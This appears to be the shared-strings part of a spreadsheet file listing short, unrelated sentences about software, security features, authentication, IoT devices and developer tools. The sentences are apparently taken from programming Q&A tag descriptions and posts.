    <t>Native Client gives languages like C and C++ the same level of portability and safety that JavaScript provides on the web today.</t>
  </si>
  <si>
    <t>LuaSec depends on OpenSSL, and integrates with LuaSocket to make it easy to add secure connections to any Lua applications or scripts.</t>
  </si>
  <si>
    <t>Protocols supported:  
FTP/FTPS
NNTP
SMTP(S)
POP3(S)
IMAP(S)
Telnet
TFTP
Finger
Whois
rexec/rcmd/rlogin
Time (rdate) and Daytime
Echo
Discard
NTP/SNTP  
Refer to https://commons.apache.org/proper/commons-net/ for additional information.</t>
  </si>
  <si>
    <t>Therefore, there is no ambiguity between the question mark as an operator to make a token optional and the question mark as part of the syntax for non-capturing groups.</t>
  </si>
  <si>
    <t>Code freeze is meant to enforce stability within the codebase of a software project by disallowing the introduction of changes.</t>
  </si>
  <si>
    <t>There are also many terminal servers on the market that have highly advanced security functionality to ensure that only qualified personnel can access various servers and that any data that is transmitted across the LAN, or over the Internet, is encrypted.</t>
  </si>
  <si>
    <t>You can build metadata on your image catalog, moderate offensive content, or enable new marketing scenarios through image sentiment analysis.</t>
  </si>
  <si>
    <t>Its full featured:
Login using username, email address or both (depending on config settings).</t>
  </si>
  <si>
    <t>This makes for much lighter, faster applications, and means Cinder apps get free performance, security and capability upgrades whenever the operating system does.</t>
  </si>
  <si>
    <t>The smc (Secure Monitor Call) instruction used to switch between worlds is of form :
I am trying to retrive this value from the smc exception handler.</t>
  </si>
  <si>
    <t>SNI (Server Name Indication) was an extension added to TLS, to support multiple digital certificates per host name on a single IP.</t>
  </si>
  <si>
    <t>Version 6 saw the inclusion of the analysis engine and version 8 500 points of SiteScope to handle unified monitoring.</t>
  </si>
  <si>
    <t>I can open my *.ino file in Arduino IDE and it is verifying it and says that
but I searched the folder that files exist and I could not find any binary file.</t>
  </si>
  <si>
    <t>I'm using Riot.js and I have a root element into which I render a different layout for login box and for the actual app.</t>
  </si>
  <si>
    <t>Combined with a PIN or password, the YubiKey provides strong two-factor authentication, protecting your identity from key loggers, trojans and the bad guys.</t>
  </si>
  <si>
    <t>By "not detected" I mean "hcitool returns nothing and OS based search for Bluetooth devices reports nothing".</t>
  </si>
  <si>
    <t>Code:
You can then use your raspberry to call something like:
Pros: Easy to implement, You can even move it further to be used from outside your firewall.</t>
  </si>
  <si>
    <t>kubeadm aims to create a secure Kubernetes cluster out of the box via mechanisms such as RBAC.</t>
  </si>
  <si>
    <t>A clone of Pico, nano, exists that resolves a license restriction that prevents the distribution of Pico on Debian Linux.</t>
  </si>
  <si>
    <t>From Wikipedia:
The Universal Verification Methodology (UVM) is a standardized methodology for verifying integrated circuit designs.</t>
  </si>
  <si>
    <t>Data is stored as key-value pairs, which are written to particular storage node(s), based on the hashed value of the primary key.</t>
  </si>
  <si>
    <t>Quoted from the manpage:
tcsh is an enhanced but completely compatible version of the Berkeley
  UNIX C shell csh It is a command language interpreter usable both as
  an interactive login shell and a shell script command processor.</t>
  </si>
  <si>
    <t>Management packs typically contain monitoring settings for applications and services.</t>
  </si>
  <si>
    <t>The Quora Extension API was released in January 2011 in alpha with the ability to read data about the currently logged-in user.</t>
  </si>
  <si>
    <t>Lets say you set your models up like so:
You can use a token based authentication scheme to authenticate each PI unit.</t>
  </si>
  <si>
    <t>Here you go:
In the new my-sql if the password is left empty while installing then it is based on the  plugin.</t>
  </si>
  <si>
    <t>BitDB is a (now deprecated) service that provides an interface to Bitcoin by providing a database that synchronizes itself with Bitcoin.</t>
  </si>
  <si>
    <t>There are many ways to customize user's own HTTP cookie management: First, call CookieHandler.setDefault to set a new CookieHandler implementation.</t>
  </si>
  <si>
    <t>IBM mainframe sorting product, available elsewhere alongside data-protection and backup solutions</t>
  </si>
  <si>
    <t xml:space="preserve">
xNet - a class library for .NET Framework, which includes:
Classes for work with proxy servers: HTTP, Socks4(a), Socks5.</t>
  </si>
  <si>
    <t>Which Bluetooth Protocol is more secure and easy to implement in this scenario ?</t>
  </si>
  <si>
    <t>You can use TLS and username and password based authentication unless you use client side certificates and enable the use_identity_as_username and require_certificate</t>
  </si>
  <si>
    <t>It does support TLS encryption, I've only implemented this over MQTT.</t>
  </si>
  <si>
    <t>UIAccessibility is an informal protocol in UIKit that provides accessibility information about user interface elements.</t>
  </si>
  <si>
    <t>e is a hardware verification language (HVL) which is tailored to implementing highly flexible and reusable verification testbenches.</t>
  </si>
  <si>
    <t>A contactless smartcard is a smartcard with a contactless communication interface in addition to or instead of a contact smartcard interface.</t>
  </si>
  <si>
    <t>Lite is an additional offering for developers and is available to everyone with an API key.</t>
  </si>
  <si>
    <t>Of course, middleware can be written to perform a variety of tasks besides authentication.</t>
  </si>
  <si>
    <t>I had interfaced R305 biometric module with microcontrollers before using embedded C. But when I tried it using python, I am having error in sending hex array to it.</t>
  </si>
  <si>
    <t>I have tried to use the Lock() functionality but I am not sure how to correctly implement it.</t>
  </si>
  <si>
    <t>libssh is a mulitplatform C library implementing the SSHv2 and SSHv1 protocol on client and server side.</t>
  </si>
  <si>
    <t>The Ruby SAML library is for implementing the client side of a SAML authorization, i.e.</t>
  </si>
  <si>
    <t>It handles the ntlm authentication required to use the soap services and provides an object-oriented interface to the complex types required to form a request.</t>
  </si>
  <si>
    <t>Waffle also includes libraries that enable drop-in Windows Single Sign On for popular Java web servers, when running on Windows.</t>
  </si>
  <si>
    <t>Everything worked fine and so requests for more algorithm types, a rule-engine for mutation of dictionaries, a windows version and different attack modes were added.</t>
  </si>
  <si>
    <t>I've looked into ways to get around this such as Page Kite, using some form of reverse SSH or HTTPS tunneling, but due to lack of support on Raspberry Pi or daunting setup I'm not really sure what to do.</t>
  </si>
  <si>
    <t>Technical questions about ACRCloud, a comprehensive automatic content recognition platform with audio fingerprinting technology.</t>
  </si>
  <si>
    <t>Gitolite is software to manage a collection of Git repositories on a server accessible by SSH, without creating local accounts for the users.</t>
  </si>
  <si>
    <t>While this feature makes it possible to create powerful, concise and type safe DSLs and other APIs it should be used with care, since it also allows to create code that is rather hard to understand.</t>
  </si>
  <si>
    <t>The channel construct is frequently used in multithreading programs to enable safe synchronization of execution threads and communication of objects between them.</t>
  </si>
  <si>
    <t>The protocol defines the messages that are sent between peers which govern establishment, termination and other essential elements of a call.</t>
  </si>
  <si>
    <t>Instead a technique called feature detection is used where a particular browser feature or bug is simulated to verify its existence.</t>
  </si>
  <si>
    <t>For most web applications (including mobile apps), the Gmail API is the best choice for authorized access to a user's Gmail data.</t>
  </si>
  <si>
    <t>They offer a free-tier Virtual Private Server level which you have full control over (including ssh).</t>
  </si>
  <si>
    <t>The real Realm magic comes when you need simple migrations or change notifications or built-in encryption.</t>
  </si>
  <si>
    <t>With isolated storage, your code no longer needs unique paths to specify safe locations in the file system, and data is protected from other applications that only have isolated storage access.</t>
  </si>
  <si>
    <t>Workforce Central v5.0 Developer's Toolkit Programmer's Guide
Official Product Documentation (requires login)
Workforce Central Suite Integration</t>
  </si>
  <si>
    <t>Refers to Angular's AuthenticationGuard class, a route protection mechanism most commonly implementing `canActivate`.</t>
  </si>
  <si>
    <t>In order to use the non root method I have exported pin 18 as out and verified it with gpio exports.</t>
  </si>
  <si>
    <t>You should be able to add Device Shadow and Device Registry data to your messages by leveraging the corresponding Pipeline Activities.</t>
  </si>
  <si>
    <t>In .NET, IIdentity interface defines basic functionality of an identity object</t>
  </si>
  <si>
    <t>From there the server will treat each person viewing the webpage differently based on how the user was tagged.</t>
  </si>
  <si>
    <t>The stumbling block seems to be the authentication as Google Home Smart Home integration requires me to implement an OAuth server.</t>
  </si>
  <si>
    <t>Firebug was a Firefox extension, which allowed the debugging, editing, and monitoring of any website's CSS, HTML, DOM, JavaScript, network traffic and cookies.</t>
  </si>
  <si>
    <t>Questions involving competitive programming, including problems from Codeforces, Facebook Hacker Cup, Google Code Jam, ICPC, IOI, SPOJ and alike.</t>
  </si>
  <si>
    <t>Nimble provides beautiful UI and ready to use functionality for login, user registration, password reset, Users, Roles, Groups and permission management.</t>
  </si>
  <si>
    <t>WCF implements many advanced Web services (WS) standards such as WS-Addressing, WS-ReliableMessaging and WS-Security.</t>
  </si>
  <si>
    <t>With UAC, each user having admin rights would have split-token - one for regular usage and one for administrative usage.</t>
  </si>
  <si>
    <t>file_name cannot be an
  existing file, which among other
  things prevents files such as
  /etc/passwd and database tables from
  being destroyed.</t>
  </si>
  <si>
    <t>Too long for the comment box 
Do you use guards for your include files?</t>
  </si>
  <si>
    <t>For details, you can check out my blog post How to extend an existing certificate, even if it has expired.</t>
  </si>
  <si>
    <t>Mac has implemented some rules for download safety that affects you.</t>
  </si>
  <si>
    <t>It is heavily used in several programming related fields, such as cryptography.</t>
  </si>
  <si>
    <t>Supports the basic and digest authorization schemes.</t>
  </si>
  <si>
    <t>One can implement own custom verification or use the reference verificators provided by the library.</t>
  </si>
  <si>
    <t>e is a hardware verification language (HVL) which is tailored to implementing highly flexible and reusable verification test-benches.</t>
  </si>
  <si>
    <t>It also offers classes such as QNetworkConfiguration, QNetworkConfigurationManager and QNetworkSession that implement bearer management.</t>
  </si>
  <si>
    <t>It provides enterprise-grade security without having to type in a password.</t>
  </si>
  <si>
    <t>As a consequence, a FOREIGN KEY referencing surrogate key tends to be slimmer than a FK referencing natural key.</t>
  </si>
  <si>
    <t>Support for PKCE, a standardized authorization code protection scheme.</t>
  </si>
  <si>
    <t>Several well-known algorithms for hidden Markov models exist.</t>
  </si>
  <si>
    <t>For security and user protection, there are many things that can only be done from an Activity.</t>
  </si>
  <si>
    <t>DRM platform owned by Google which combines DASH, CENC and EME to provide multiplatform content protection.</t>
  </si>
  <si>
    <t>Code protection &amp; packaging is another feature of JXcore.</t>
  </si>
  <si>
    <t>The benefits of having robust code are many, some of the most important ones are:
1.</t>
  </si>
  <si>
    <t>The Common Name is used to identify this certificate in the Azure web interface.In addition, the operation will be more simple and precise based on the official documationation(PowerShell scripts to manage CA-signed X.509 certificates).</t>
  </si>
  <si>
    <t>For Java and C sdks there are IotHubEventCallback and IOTHUB_CLIENT_EVENT_CONFIRMATION_CALLBACK but for C# there is no such interface implemented.</t>
  </si>
  <si>
    <t>The server uses Digest Authentication while HTTPClient library on ESP32 currently only supports Basic Authentication.</t>
  </si>
  <si>
    <t>[Side note: this is fakable so not perfect]
Individually encrypt each instructions manually, including a shared private key on your webserver and a unique ID embedded in each message.</t>
  </si>
  <si>
    <t>Now after searching on the internet, I think Mac is not detecting my board.</t>
  </si>
  <si>
    <t>I am working on the trust zone extension on raspberry pi B+ which has the ARM1176JZF-S processor.</t>
  </si>
  <si>
    <t>I am not clear how the Arduino shield board for Intel Edison is supporting UART to Tx/Rx data through XBee S2.</t>
  </si>
  <si>
    <t>I'm currently connecting to a Raspberry Pi Model B running Raspbian via SSH.</t>
  </si>
  <si>
    <t>So we can use intelisence and all other neat features?</t>
  </si>
  <si>
    <t>I have searched a few examples of how to get the gateway but they didnt work.</t>
  </si>
  <si>
    <t>Does the WiFiClientSecure support this encryption?</t>
  </si>
  <si>
    <t>I am looking for a way to integrate the IOT with Blockchain.</t>
  </si>
  <si>
    <t>However, I don't see RSA256 supported in crypto.</t>
  </si>
  <si>
    <t>Am I just looking for the algo name in crypto or is this just plain not supported?</t>
  </si>
  <si>
    <t>I dought that this lib will only work with Intel Architecture.</t>
  </si>
  <si>
    <t>Can it be that the WifiClientSecure and the ArduinoJson are conflicting with each other?</t>
  </si>
  <si>
    <t>Does AWS SDK supports Java for cognito access from Server?</t>
  </si>
  <si>
    <t>Does Windows IOT supports CNG/BCrypt APIs?</t>
  </si>
  <si>
    <t>It seems that hostname of iothub's certificate is not validated when connecting to it.</t>
  </si>
  <si>
    <t>MIFARE Ultralight does not support (or need) authentication.</t>
  </si>
  <si>
    <t>Passphrase is currently not supported.</t>
  </si>
  <si>
    <t>The most convenient debug proxy I know of is Fiddler2.</t>
  </si>
  <si>
    <t>There is no easy way to determine the protocol from a black box.</t>
  </si>
  <si>
    <t>Of course, security is essential here too.</t>
  </si>
  <si>
    <t>Iceweasel is a port of Firefox which supports NTLM authentication on the Raspberry Pi.</t>
  </si>
  <si>
    <t>In addition part of your SharedAccessKey seems to be escaped.</t>
  </si>
  <si>
    <t>It currently supports certificate (EAP-TLS) but not password (PEAP) authentication.</t>
  </si>
  <si>
    <t>You need to enable it in /app/include/user_config.h by defining CLIENT_SSL_ENABLE.</t>
  </si>
  <si>
    <t>at the end, you decrypt the data in the database using the key you kept in your cellar.</t>
  </si>
  <si>
    <t>Then login to it, there you can take SMS integrations.</t>
  </si>
  <si>
    <t>There's no easy way (that I know of) to encrypt your WiFi password on the ESP8266.</t>
  </si>
  <si>
    <t>Then, you should integrate your Blockchain with the Watson IoT.</t>
  </si>
  <si>
    <t>Thats because privileged is not supported in docker swarm.</t>
  </si>
  <si>
    <t>It seems that tk102-2 does not support HTTPS protocol.You should check the specification of the GPRS module in tk102-2.</t>
  </si>
  <si>
    <t>Validate it, i.e.</t>
  </si>
  <si>
    <t>Also security is an aspect to keep an eye on.</t>
  </si>
  <si>
    <t>The disadvantage is there is a delay after you release a key.</t>
  </si>
  <si>
    <t>Windows Biometric Framework (See: http://msdn.microsoft.com/en-us/windows/hardware/gg463089) is a framework from Microsoft.</t>
  </si>
  <si>
    <t>authz is a shorthand for "authorization" in a variety of development contexts.</t>
  </si>
  <si>
    <t>Data sanitization to prevent code injection</t>
  </si>
  <si>
    <t>ServiceStack's Authentication features</t>
  </si>
  <si>
    <t>a grunt plugin to validate files with JSHint.</t>
  </si>
  <si>
    <t>Gzippo is a NodeJS middleware for express gzip / connect for gzip support.</t>
  </si>
  <si>
    <t>For the iOS 7.1 Safari feature, use [safari-minimal-ui]</t>
  </si>
  <si>
    <t>a co-processor/accelerator from Intel</t>
  </si>
  <si>
    <t>The OAuth 2.0 Authorization Framework</t>
  </si>
  <si>
    <t>Atom.IO is a "A hackable text editor for the 21st Century".</t>
  </si>
  <si>
    <t>valdr Bean Validation is a JSR 303 plugin for valdr i.e.</t>
  </si>
  <si>
    <t>Validate files with JSXHint.</t>
  </si>
  <si>
    <t>encrypt/decrypt Android Sqlite  DataBase</t>
  </si>
  <si>
    <t>A validation plugin for Aurelia.</t>
  </si>
  <si>
    <t>Hamsterdb is a transactional key-value database.</t>
  </si>
  <si>
    <t>bValidator is a form validation jQuery plug-in.</t>
  </si>
  <si>
    <t>Licensed under MIT License.</t>
  </si>
  <si>
    <t>An express.js middleware library for validation and sanitization.</t>
  </si>
  <si>
    <t>This does not require Facebook Login or any extended permissions.</t>
  </si>
  <si>
    <t>Krypton (A.K.A Krypton XNA) is a 2d light engine for XNA 4.0.</t>
  </si>
  <si>
    <t>Tron-Box is a fork from Truffle and it is a development environment, testing framework and asset pipeline for Tron blockchain</t>
  </si>
  <si>
    <t>The opposite of transparency is opacity.</t>
  </si>
  <si>
    <t>Apple's cryptography framework.</t>
  </si>
  <si>
    <t>It uses XPath and XSLT to validate rules most other schemas can not.</t>
  </si>
  <si>
    <t>Mock protocols and notification observers.</t>
  </si>
  <si>
    <t>Opacity is the opposite of transparency.</t>
  </si>
  <si>
    <t>Links:
MSDN article on Declarative Security</t>
  </si>
  <si>
    <t>Encog trains using multithreaded resilient propagation.</t>
  </si>
  <si>
    <t>lint - Validate files with JSHint.</t>
  </si>
  <si>
    <t>Automatic Gain Control (AGC).</t>
  </si>
  <si>
    <t>The Opera browser supports user-javascript in a slightly different way than Google Chrome or Firefox or Tampermonkey.</t>
  </si>
  <si>
    <t>Semantics+QoS+Security.</t>
  </si>
  <si>
    <t>See also:
django-auth
ldap</t>
  </si>
  <si>
    <t>Key files are not currently supported.</t>
  </si>
  <si>
    <t>Integrated iOS 6 Facebook Authentication.</t>
  </si>
  <si>
    <t>Fill out the form and select Register.</t>
  </si>
  <si>
    <t>Validate files with JSHint.</t>
  </si>
  <si>
    <t>The module supports both kerberos4 and kerberos5 protocols for password verification.</t>
  </si>
  <si>
    <t>Everything is MIT licensed.</t>
  </si>
  <si>
    <t>The AccessDataSource class is a data source control that works with Microsoft Access database files.</t>
  </si>
  <si>
    <t>It can also be used to validate an .edmx file.</t>
  </si>
  <si>
    <t>Peer to peer cache cluster architecture.</t>
  </si>
  <si>
    <t>zpaq is for user-level backups.</t>
  </si>
  <si>
    <t>Masked textbox is a Kendo UI (kendo-ui) component.</t>
  </si>
  <si>
    <t>LiquidHaskell is a static verifier which works with the Haskell language.</t>
  </si>
  <si>
    <t>Overture is MIT licensed.</t>
  </si>
  <si>
    <t>Features:
Runtime permissions.</t>
  </si>
  <si>
    <t>Safari version 11 released at September 19, 2017.</t>
  </si>
  <si>
    <t>RFC 6749 - The OAuth 2.0 Authorization Framework.</t>
  </si>
  <si>
    <t>Firefox 11.0-34.0
Apple Mac OS X 10.6 or later (any Intel Mac)
Google Chrome 5.0-39.0 (32-bit)
Safari 3.1+
Firefox 11.0-34
The plugin is not supported on Linux, nor any mobile devices.</t>
  </si>
  <si>
    <t>the use of Subversion is possible with Subversive or Subclipse).</t>
  </si>
  <si>
    <t>Fork of libgit2sharp with SSH support</t>
  </si>
  <si>
    <t>Part of the Java Cryptographic Architecture.</t>
  </si>
  <si>
    <t>The code is licensed under GNU Lesser GPL.</t>
  </si>
  <si>
    <t>Various ways to integrate Zend_Auth with Zend_Acl.</t>
  </si>
  <si>
    <t>SSH2 protocol support.</t>
  </si>
  <si>
    <t>It supports password authentication and digital certificate authentication.</t>
  </si>
  <si>
    <t>Integrated Windows Authentication on Wikipedia</t>
  </si>
  <si>
    <t>You can implement any network protocol in the browserwithout resorting to plugins.</t>
  </si>
  <si>
    <t>Transparency is the opposite of opacity.</t>
  </si>
  <si>
    <t>Safari 5.1+: Supported via Tampermonkey.</t>
  </si>
  <si>
    <t>The parser is not limited to valid HTML and can also parse HTML code that did not pass W3C validation.</t>
  </si>
  <si>
    <t>Besides LDAP it supports Kerberos 5 and the Change Password Protocol.</t>
  </si>
  <si>
    <t>The WebFinger protocol is currently under development.</t>
  </si>
  <si>
    <t>The foreign key itself doesn't have to be a key.</t>
  </si>
  <si>
    <t>Updates: So far, I tried chmod 755 and 777 methods and creating a new user in the SQL client with granting of full privileges and file (and then logging in as that user to make the query), but have had no success .</t>
  </si>
  <si>
    <t>Thanks to a helpful Google engineer on Github who answered the Issue Clarify how trusted_RootCA_certs were chosen in the Google provided iot-device-sdk-embedded-c project, the solution is to use a long-term support (LTS) domain.</t>
  </si>
  <si>
    <t>This ability is built on a straightforward key management and signing interface to create signed collections and configure trusted publishers.</t>
  </si>
  <si>
    <t>Common reasons for updating firmware include fixing bugs or adding features to the device.</t>
  </si>
  <si>
    <t>Key and Certificate Management Tool: manages a keystore (database) of cryptographic keys, X.509 certificate chains, and trusted certificates.</t>
  </si>
  <si>
    <t>Following are Google's requirements:
CA and device certificates must be X.509v3, encoded in base64, wrapped in -----BEGIN CERTIFICATE----- and -----END CERTIFICATE-----.</t>
  </si>
  <si>
    <t>Presumably because the buffer is not filled fast enough, but I'm open to additional theories if someone can provide suggestions on how to verify them.</t>
  </si>
  <si>
    <t>Access can be controlled based on the client hostname, IP address, or other characteristics of the client request, as captured in environment variables.</t>
  </si>
  <si>
    <t>In this event, your router firmware would have to implement a network reset to initiate the search.</t>
  </si>
  <si>
    <t>CAPICOM is a discontinued ActiveX control created by Microsoft to help expose a select set of Microsoft Cryptographic Application Programming Interface (CryptoAPI) functions through Microsoft Component Object Model (COM).</t>
  </si>
  <si>
    <t>`jConfirm` is a `jQuery` plugin to make pretty confirmation boxes.</t>
  </si>
  <si>
    <t>It also doesn't support hash based routing or browsers below IE 10.</t>
  </si>
  <si>
    <t>Main features:
built-in monitoring of server resources via SSH transport;
ability to stop load test execution based on runtime criteria, i.e.</t>
  </si>
  <si>
    <t>CSP support in frameworks
AngularJS ngCsp
django-security
Ruby on Rails
CSP Builder
CSP report analytics and iterative policy refining</t>
  </si>
  <si>
    <t>Ontology is a high-performance public blockchain project (like Ethereum and Bitcoin).</t>
  </si>
  <si>
    <t>Suhosin is an advanced protection system for PHP installations.</t>
  </si>
  <si>
    <t>More information about Parsec, including usage examples, can be found on the Parsec website.</t>
  </si>
  <si>
    <t>Once associated with a program entity, the attribute can be queried at run time and used in any number of ways.</t>
  </si>
  <si>
    <t>Incorrect data validation can lead to data corruption or a security vulnerability.</t>
  </si>
  <si>
    <t>For example using PyInstaller
Although you can never (even with C++) guarantee full "protection".</t>
  </si>
  <si>
    <t>Though better than basic authentication, digest authentication is not considered strong authentication.</t>
  </si>
  <si>
    <t>Basic encryption (RC4) support.</t>
  </si>
  <si>
    <t>Safari 5.1.7, released on May 9, 2012, is the last version available for Windows.</t>
  </si>
  <si>
    <t>All types of failures are dealt as recoverable failures that could potentially be recovered - so the documentation should be fixed to reflect current functionality 2018_11_20 release.</t>
  </si>
  <si>
    <t>However, the value of a SecureString object is automatically encrypted, can be modified until the application marks it as read-only, and can be deleted from computer memory by either the application or the .NET Framework garbage collector.</t>
  </si>
  <si>
    <t>I am developing Mobile test automation tool and I have encountered a problem regarding disabling the charging capability of Android device without using root.</t>
  </si>
  <si>
    <t>Why not extend it to scp the file onto your Raspberry to the proper place, or even to create an ssh connection, start up the tomcat and  the catalina.out directly to your Eclipse console.</t>
  </si>
  <si>
    <t>This is due in part to the nearly infinite re-occurrence (keyword stuffing) of meta elements and/or to attempts by unscrupulous website placement consultants to manipulate (spamdexing) or otherwise circumvent search engine ranking algorithms.</t>
  </si>
  <si>
    <t>When I'm ssh'ed in, I get the X window output of the graphic.</t>
  </si>
  <si>
    <t>I would like it to connect to my Ubuntu server , get access to the database so as to allow or not allow permissions.</t>
  </si>
  <si>
    <t>Can I use python to register and receive the notifications?</t>
  </si>
  <si>
    <t>I sniffed a XBEE S1 packet and it's normally a full 802.15.4 packet.</t>
  </si>
  <si>
    <t>I recompiled my Raspberry Pi's Linux Kernel to enable some debug features.</t>
  </si>
  <si>
    <t>Easy way to check if the devices are on is running the code:    
0100 means on 0000 means off.</t>
  </si>
  <si>
    <t>I can add more features later on like security, etc...</t>
  </si>
  <si>
    <t>VS asks for a PIN during deployment that I cannot provide.</t>
  </si>
  <si>
    <t>I have a simple php login portal using a mysql database for authentication.</t>
  </si>
  <si>
    <t>In my mobile application, I am using wso2is(wso2 identity server) for user authentication.</t>
  </si>
  <si>
    <t>So the question is does anyone know how to get the hot keys working in the shell channel?</t>
  </si>
  <si>
    <t>I have no idea what or how to do "persistent permissions".</t>
  </si>
  <si>
    <t>Unfortunately, I can't find how to validate that.</t>
  </si>
  <si>
    <t>Device id is there, but it is optional field.</t>
  </si>
  <si>
    <t>I'm getting an error when trying to invoke my custom authorizer.</t>
  </si>
  <si>
    <t>Automatic login to desktop is enabled.</t>
  </si>
  <si>
    <t>To use the less secure SMB1 dialect to access old servers which do not support SMB3 (or SMB2.1) specify vers=1.0 on mount.</t>
  </si>
  <si>
    <t>Why does my additions to the gpio-key seem to disable the other keys?</t>
  </si>
  <si>
    <t>The remote certificate is invalid according to the validation?</t>
  </si>
  <si>
    <t>The code on the Raspberry is ok because I am already connected to other devices but when i search for the adress of the STM it doesn't appear.</t>
  </si>
  <si>
    <t>This would be much easier so I don`t have to safe them first on my pc.</t>
  </si>
  <si>
    <t>I'm looking for a basic sanity validation.</t>
  </si>
  <si>
    <t>But I have no idea how can I integrate it with blockchain as I am very new to blockchain technology</t>
  </si>
  <si>
    <t>For an SSH terminal connection I reccomend TouchTerm (search the appstore).</t>
  </si>
  <si>
    <t>Unfortunately I am no security expert and I can't tell you what this choice means for your security.</t>
  </si>
  <si>
    <t>If you want the threshold to be persistent even when the device is unplugged, you'll need to use the Arduino's EEPROM.</t>
  </si>
  <si>
    <t>I found that using sshfs is much easier than nfs or samba under Linux.</t>
  </si>
  <si>
    <t>Source code will work when using only resolution 320x240 or above that is because xuggle xugglers lousy webcam support.</t>
  </si>
  <si>
    <t>This is a key security feature of most modern systems.</t>
  </si>
  <si>
    <t>Your code must be synchronized on both side.</t>
  </si>
  <si>
    <t>[Disclaimer: I'm not very convinced by the Java security model.]</t>
  </si>
  <si>
    <t>Another way is to jailbreak your iPhone, and then figure out how to get access to notifications.</t>
  </si>
  <si>
    <t>Build a custom firmware from the  or master branch.</t>
  </si>
  <si>
    <t>If you have SSH access to the network the Raspberry is connected to, you can use
nmap
to scan the network for devices, and pipe it with grep to search for the devices.</t>
  </si>
  <si>
    <t>The question is, are they going to still support Edison since Intel announced that they are cancelling it.</t>
  </si>
  <si>
    <t>In your VS Studio Project Properties -&gt; Debug Tab -&gt; Authentication Mode: Window Authentication</t>
  </si>
  <si>
    <t>More importantly, I think it would release access of the device/file for other processes.</t>
  </si>
  <si>
    <t>When you enable "TLS/SSL support" in the builder you get the tls module automatically.</t>
  </si>
  <si>
    <t>Secure Gateway is available for i386, s390x and ppc64el architecture.</t>
  </si>
  <si>
    <t>The easiest way I can think of is by sending a file over SSH using SFTP.</t>
  </si>
  <si>
    <t>The validation is straight to check for NaN or something numeric.</t>
  </si>
  <si>
    <t>Device id is there, but it
  is optional field.</t>
  </si>
  <si>
    <t>Both DPS as well as Azure IoT Hub support SHA256 thumbprints.</t>
  </si>
  <si>
    <t>In addition, I had to correct a subtle error in my root CA certificate.</t>
  </si>
  <si>
    <t>If it ever becomes compromised, just restore the backup.</t>
  </si>
  <si>
    <t>The  capability should be enabled for Tcp server.</t>
  </si>
  <si>
    <t>If you want to validate user input and only allow 'a'-'z' or 'A'-'Z', you can do:</t>
  </si>
  <si>
    <t>It's up to you to balance cost vs security.</t>
  </si>
  <si>
    <t>Security: once again both are secured in exactly the same way using AWS IoT's client/certificate security model.</t>
  </si>
  <si>
    <t>As far as I know they also support using the one which is provided as part of the JDK or allow to use conscrypt.</t>
  </si>
  <si>
    <t>You'll have to take many more aspects such as security and scaleability into account.</t>
  </si>
  <si>
    <t>Key validation is then skipped.</t>
  </si>
  <si>
    <t>Schematron Verification Report Language</t>
  </si>
  <si>
    <t>The key component is the Trusted Platform Module (TPM).</t>
  </si>
  <si>
    <t>Toopher is a two factor authentication (2FA) provider</t>
  </si>
  <si>
    <t>Frox is a transparent ftp proxy which is released under the GPL.</t>
  </si>
  <si>
    <t>Nimble is a Grails plugin and provides kickstart authentication and authorization functionality to any Grails application.</t>
  </si>
  <si>
    <t>The AccessDataSource class is a data source control that works with Microsoft Access databases.</t>
  </si>
  <si>
    <t>Vault is a Permissions, Chat, &amp; Economy API for Bukkit plugins.</t>
  </si>
  <si>
    <t>Safe OpenGL wrapper for the Rust language</t>
  </si>
  <si>
    <t>Low-fi proxy server for component CDNs</t>
  </si>
  <si>
    <t>Passport strategy for authenticating with Freshbooks.</t>
  </si>
  <si>
    <t>pwntools is a CTF framework and exploit development library.</t>
  </si>
  <si>
    <t>PeopleCode is the proprietary language used by PeopleSoft applications.</t>
  </si>
  <si>
    <t>Should not be confused with Security Development Lifecycle.</t>
  </si>
  <si>
    <t>A decentralized application (Dapp, dApp or DApp) is an application that is run by many users on a decentralized network with trustless protocols.</t>
  </si>
  <si>
    <t>It may contain alpha planes for transparency.</t>
  </si>
  <si>
    <t>Code permissions framework for .NET applications.</t>
  </si>
  <si>
    <t>The FTP, HTTP and HTTPS protocols are supported.</t>
  </si>
  <si>
    <t>Promela is a verification modeling language.</t>
  </si>
  <si>
    <t>Transparency is also known as alpha blending.</t>
  </si>
  <si>
    <t>Tank Auth is an authentication library for PHP-framework CodeIgniter.</t>
  </si>
  <si>
    <t>Botan is a BSD-licensed crypto library for C++ applications.</t>
  </si>
  <si>
    <t>In Haskell this is modeled by guarded recursion.</t>
  </si>
  <si>
    <t>Feature detection is to be used instead.</t>
  </si>
  <si>
    <t>Supports access through proxy servers.</t>
  </si>
  <si>
    <t>ACL methods now part of Permission model.</t>
  </si>
  <si>
    <t>Officially Intel states the initials are meaningless.</t>
  </si>
  <si>
    <t>Deep Belief Networks, a key concept in contemporary neural-networks.</t>
  </si>
  <si>
    <t>Easy user registration.</t>
  </si>
  <si>
    <t>It is cross-platform and supports CGI, SSL,SSI, Digest auth, WebDAV and websocket.</t>
  </si>
  <si>
    <t>Secure Form with CSRF token.</t>
  </si>
  <si>
    <t>Automatic socket acceptance.</t>
  </si>
  <si>
    <t>It also supports DNS tunneling through proxies.</t>
  </si>
  <si>
    <t>Cloud 9 is a licenced software suite.</t>
  </si>
  <si>
    <t>ProGuard and app-signing capabilities.</t>
  </si>
  <si>
    <t>Most of the new features are related to security.</t>
  </si>
  <si>
    <t>SSL certificates for interception are generated on the fly.</t>
  </si>
  <si>
    <t>User access control and charting.</t>
  </si>
  <si>
    <t>Cube does not provide access control, so any data you put into Cube can be queried by anyone that can access your evaluator.</t>
  </si>
  <si>
    <t>Where correctness is in doubt, this is highlighted.</t>
  </si>
  <si>
    <t>This way the reliability and stability of the code is increased.</t>
  </si>
  <si>
    <t>A document can be released or unreleased.</t>
  </si>
  <si>
    <t>If a Windows object does not have a discretionary access control list (DACL), the system allows everyone full access to it.</t>
  </si>
  <si>
    <t>OAuth2.0 is a authorization framework which is defined by RFC6749.</t>
  </si>
  <si>
    <t>Trusted versioning with semver.</t>
  </si>
  <si>
    <t>It features four technologies, ZFS, DTrace, Zones and KVM.</t>
  </si>
  <si>
    <t>Bitcoin Core, Tor), or used in a heavily regulated market (e.g.</t>
  </si>
  <si>
    <t>Torsocks allows you to use most applications in a safe way with Tor.</t>
  </si>
  <si>
    <t>// Default certificates
        key: keyPath,  
        cert: certPath,
        ca: caPath // Optional.</t>
  </si>
  <si>
    <t>Facebook's Graph API only supports OAuth 2.0.</t>
  </si>
  <si>
    <t>It was formerly knows as DotNetOpenId, but was renamed when it added OAuth and InfoCard support.</t>
  </si>
  <si>
    <t>Leakproof Abstraction
There is no ORM involved.</t>
  </si>
  <si>
